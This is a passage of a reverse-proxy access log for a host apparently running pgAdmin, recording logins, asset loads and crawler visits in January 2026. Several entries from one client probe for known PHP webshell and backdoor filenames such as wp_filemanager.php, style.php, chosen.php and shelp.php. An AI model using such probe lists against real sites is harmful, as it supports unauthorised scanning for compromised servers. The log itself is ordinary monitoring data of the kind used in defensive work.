172.17.0.1] "-" "-" +[20/Jan/2026:12:28:48 +0000] - - 499 - GET https targetts.ddns.net "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 40.83.96.65] [Length 0] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[20/Jan/2026:16:49:56 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 35.227.45.121] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[20/Jan/2026:16:49:56 +0000] - 502 502 - GET https targetts.ddns.net "/" [Client 35.227.45.121] [Length 154] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://targetts.ddns.net" +[21/Jan/2026:00:42:31 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 51.75.141.254] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[21/Jan/2026:00:42:32 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 185.94.190.201] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; arm_64; Android 12; FOA-LX9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.60 YaBrowser/25.10.6.60.00 SA/3 Mobile Safari/537.36" "-" +[21/Jan/2026:00:42:33 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 51.75.141.254] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "req/v3 (https://github.com/imroc/req)" "-" +[21/Jan/2026:00:42:34 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 23.19.230.168] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Mobile/15E148 Safari/604.1" "-" +[21/Jan/2026:00:42:35 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 51.75.141.254] [Length 2424] [Gzip -] [Sent-to 172.17.0.1] "req/v3 (https://github.com/imroc/req)" "-" +[21/Jan/2026:00:42:36 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 185.94.190.201] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "req/v3 (https://github.com/imroc/req)" "-" +[21/Jan/2026:00:42:41 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 23.19.230.168] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "req/v3 (https://github.com/imroc/req)" "-" +[21/Jan/2026:00:42:42 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 185.94.190.201] [Length 2422] [Gzip -] [Sent-to 172.17.0.1] "req/v3 (https://github.com/imroc/req)" "-" +[21/Jan/2026:00:42:44 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 23.19.230.168] [Length 2421] [Gzip -] [Sent-to 172.17.0.1] "req/v3 (https://github.com/imroc/req)" "-" +[21/Jan/2026:00:43:27 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 51.75.141.254] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 YaBrowser/25.12.3.802.10 SA/3 Mobile/15E148 Safari/604.1" "-" +[21/Jan/2026:00:43:32 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 51.75.141.254] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "req/v3 (https://github.com/imroc/req)" "-" +[21/Jan/2026:00:43:34 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 51.75.141.254] [Length 2422] [Gzip -] [Sent-to 172.17.0.1] "req/v3 (https://github.com/imroc/req)" "-" +[21/Jan/2026:00:46:42 +0000] - - 301 - GET http targetts.ddns.net "/favicon.ico" [Client 51.75.141.254] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[21/Jan/2026:00:46:44 +0000] - 302 302 - GET https targetts.ddns.net "/favicon.ico" [Client 51.75.141.254] [Length 245] [Gzip -] [Sent-to 172.17.0.1] "req/v3 (https://github.com/imroc/req)" "-" +[21/Jan/2026:00:46:47 +0000] - 200 200 - GET https targetts.ddns.net "/static/favicon.ico?ver=91100" [Client 51.75.141.254] [Length 78998] [Gzip -] [Sent-to 172.17.0.1] "req/v3 (https://github.com/imroc/req)" "-" +[21/Jan/2026:01:49:14 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 104.168.28.15] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "-" +[21/Jan/2026:01:49:14 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 104.168.28.15] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "http://targetts.ddns.net/" +[21/Jan/2026:01:49:14 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 104.168.28.15] [Length 2391] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "https://targetts.ddns.net/" +[21/Jan/2026:02:28:21 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 34.187.155.59] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:02:28:22 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 34.187.155.59] [Length 2308] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:02:28:22 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.react.js?ver=91100" [Client 34.187.155.59] [Length 150876] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:02:28:22 +0000] - 302 302 - GET https targetts.ddns.net "/favicon.ico?ver=91100" [Client 34.187.155.59] [Length 245] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:02:28:22 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 34.187.155.59] [Length 5734] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:02:28:22 +0000] - 200 200 - GET https targetts.ddns.net "/static/vendor/require/require.min.js?ver=91100" [Client 34.187.155.59] [Length 6947] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:02:28:22 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/style.css?ver=91100" [Client 34.187.155.59] [Length 87470] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:02:28:22 +0000] - 200 200 - GET https targetts.ddns.net "/static/favicon.ico?ver=91100" [Client 34.187.155.59] [Length 78998] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:02:28:22 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 34.187.155.59] [Length 167356] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:02:28:23 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.main.js?ver=91100" [Client 34.187.155.59] [Length 313733] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:02:28:23 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.others.js?ver=91100" [Client 34.187.155.59] [Length 2321194] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:04:07:18 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 95.181.239.141] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36" "-" +[21/Jan/2026:04:07:19 +0000] - - 301 - GET http targetts.ddns.net "/favicon.ico" [Client 95.181.239.141] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[21/Jan/2026:04:07:19 +0000] - 302 302 - GET https targetts.ddns.net "/favicon.ico" [Client 196.196.53.29] [Length 245] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[22/Jan/2026:01:45:51 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 34.82.83.37] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:01:45:51 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 34.82.83.37] [Length 2312] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:01:45:51 +0000] - 200 200 - GET https targetts.ddns.net "/static/vendor/require/require.min.js?ver=91100" [Client 34.82.83.37] [Length 6947] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:01:45:52 +0000] - 302 302 - GET https targetts.ddns.net "/favicon.ico?ver=91100" [Client 34.82.83.37] [Length 245] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:01:45:52 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 34.82.83.37] [Length 5734] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:01:45:52 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/style.css?ver=91100" [Client 34.82.83.37] [Length 87470] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:01:45:52 +0000] - 200 200 - GET https targetts.ddns.net "/static/favicon.ico?ver=91100" [Client 34.82.83.37] [Length 78998] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:01:45:52 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.react.js?ver=91100" [Client 34.82.83.37] [Length 150876] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:01:45:52 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 34.82.83.37] [Length 167356] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:01:45:52 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.main.js?ver=91100" [Client 34.82.83.37] [Length 313733] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:01:45:53 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.others.js?ver=91100" [Client 34.82.83.37] [Length 2321194] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:12:55:07 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 206.168.34.63] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[22/Jan/2026:12:55:26 +0000] - 200 200 - GET https targetts.ddns.net "/login" [Client 206.168.34.63] [Length 2390] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[22/Jan/2026:13:19:03 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 199.45.155.82] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[22/Jan/2026:15:46:57 +0000] - 404 404 - GET https targetts.ddns.net "/robots.txt" [Client 138.246.253.24] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36" "-" +[22/Jan/2026:17:01:35 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 3.151.194.164] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[22/Jan/2026:17:01:35 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 3.151.194.164] [Length 2388] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "https://targetts.ddns.net/" +[22/Jan/2026:17:02:04 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 3.151.194.164] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[22/Jan/2026:17:02:04 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 3.151.194.164] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "http://targetts.ddns.net/" +[22/Jan/2026:17:02:04 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 3.151.194.164] [Length 2390] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "https://targetts.ddns.net/" +[23/Jan/2026:03:02:49 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 34.19.112.70] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[23/Jan/2026:03:02:49 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 34.19.112.70] [Length 2310] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[23/Jan/2026:03:02:49 +0000] - 302 302 - GET https targetts.ddns.net "/favicon.ico?ver=91100" [Client 34.19.112.70] [Length 245] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[23/Jan/2026:03:02:49 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/style.css?ver=91100" [Client 34.19.112.70] [Length 87470] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[23/Jan/2026:03:02:49 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 34.19.112.70] [Length 5734] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[23/Jan/2026:03:02:49 +0000] - 200 200 - GET https targetts.ddns.net "/static/vendor/require/require.min.js?ver=91100" [Client 34.19.112.70] [Length 6947] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[23/Jan/2026:03:02:49 +0000] - 200 200 - GET https targetts.ddns.net "/static/favicon.ico?ver=91100" [Client 34.19.112.70] [Length 78998] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[23/Jan/2026:03:02:49 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.react.js?ver=91100" [Client 34.19.112.70] [Length 150876] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[23/Jan/2026:03:02:50 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 34.19.112.70] [Length 167356] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[23/Jan/2026:03:02:50 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.main.js?ver=91100" [Client 34.19.112.70] [Length 313733] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[23/Jan/2026:03:02:50 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.others.js?ver=91100" [Client 34.19.112.70] [Length 2321194] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[23/Jan/2026:22:49:02 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 18.213.106.41] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[23/Jan/2026:22:49:02 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 18.213.106.41] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[23/Jan/2026:22:49:02 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 18.213.106.41] [Length 2392] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[24/Jan/2026:04:56:49 +0000] - 404 404 - GET https targetts.ddns.net "/robots.txt" [Client 74.7.241.150] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[24/Jan/2026:07:58:09 +0000] - - 301 - GET http targetts.ddns.net "/style.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:10 +0000] - 404 404 - GET https targetts.ddns.net "/style.php" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/style.php" +[24/Jan/2026:07:58:10 +0000] - - 301 - GET http targetts.ddns.net "/wp-content/style.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:10 +0000] - 404 404 - GET https targetts.ddns.net "/wp-content/style.php" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/wp-content/style.php" +[24/Jan/2026:07:58:10 +0000] - - 301 - GET http targetts.ddns.net "/wp-content/themes/style.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:11 +0000] - 404 404 - GET https targetts.ddns.net "/wp-content/themes/style.php" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/wp-content/themes/style.php" +[24/Jan/2026:07:58:11 +0000] - - 301 - GET http targetts.ddns.net "/wp-admin/style.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:11 +0000] - 404 404 - GET https targetts.ddns.net "/wp-admin/style.php" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/wp-admin/style.php" +[24/Jan/2026:07:58:11 +0000] - - 301 - GET http targetts.ddns.net "/wp-includes/style.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:11 +0000] - 404 404 - GET https targetts.ddns.net "/wp-includes/style.php" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/wp-includes/style.php" +[24/Jan/2026:07:58:11 +0000] - - 301 - GET http targetts.ddns.net "/chosen.php?p=" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:12 +0000] - 404 404 - GET https targetts.ddns.net "/chosen.php?p=" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/chosen.php?p=" +[24/Jan/2026:07:58:12 +0000] - - 301 - GET http targetts.ddns.net "/file.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:12 +0000] - 404 404 - GET https targetts.ddns.net "/file.php" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/file.php" +[24/Jan/2026:07:58:12 +0000] - - 301 - GET http targetts.ddns.net "/flower.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:12 +0000] - 404 404 - GET https targetts.ddns.net "/flower.php" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/flower.php" +[24/Jan/2026:07:58:13 +0000] - - 301 - GET http targetts.ddns.net "/gifclass.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:13 +0000] - 404 404 - GET https targetts.ddns.net "/gifclass.php" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/gifclass.php#888xyz999" +[24/Jan/2026:07:58:13 +0000] - - 301 - GET http targetts.ddns.net "/bless.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:13 +0000] - 404 404 - GET https targetts.ddns.net "/bless.php" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/bless.php#888xyz999" +[24/Jan/2026:07:58:13 +0000] - - 301 - GET http targetts.ddns.net "/class-t.api.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:13 +0000] - 404 404 - GET https targetts.ddns.net "/class-t.api.php" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/class-t.api.php#888xyz999" +[24/Jan/2026:07:58:14 +0000] - - 301 - GET http targetts.ddns.net "/blurbs.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:14 +0000] - 404 404 - GET https targetts.ddns.net "/blurbs.php" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/blurbs.php#888xyz999" +[24/Jan/2026:07:58:14 +0000] - - 301 - GET http targetts.ddns.net "/akcc.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:14 +0000] - 404 404 - GET https targetts.ddns.net "/akcc.php" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/akcc.php" +[24/Jan/2026:07:58:14 +0000] - - 301 - GET http targetts.ddns.net "/abcd.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:14 +0000] - 404 404 - GET https targetts.ddns.net "/abcd.php" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/abcd.php" +[24/Jan/2026:07:58:15 +0000] - - 301 - GET http targetts.ddns.net "/shelp.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:15 +0000] - 404 404 - GET https targetts.ddns.net "/shelp.php" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/shelp.php" +[24/Jan/2026:07:58:15 +0000] - - 301 - GET http targetts.ddns.net "/cord.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[24/Jan/2026:07:58:15 +0000] - 404 404 - GET https targetts.ddns.net "/cord.php" [Client 104.28.235.60] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/cord.php" +[24/Jan/2026:07:58:15 +0000] - - 301 - GET http targetts.ddns.net "/dex.php" [Client 104.28.235.60] [Length 166] [Gzip -] [Sent-to 172.17.0.1] 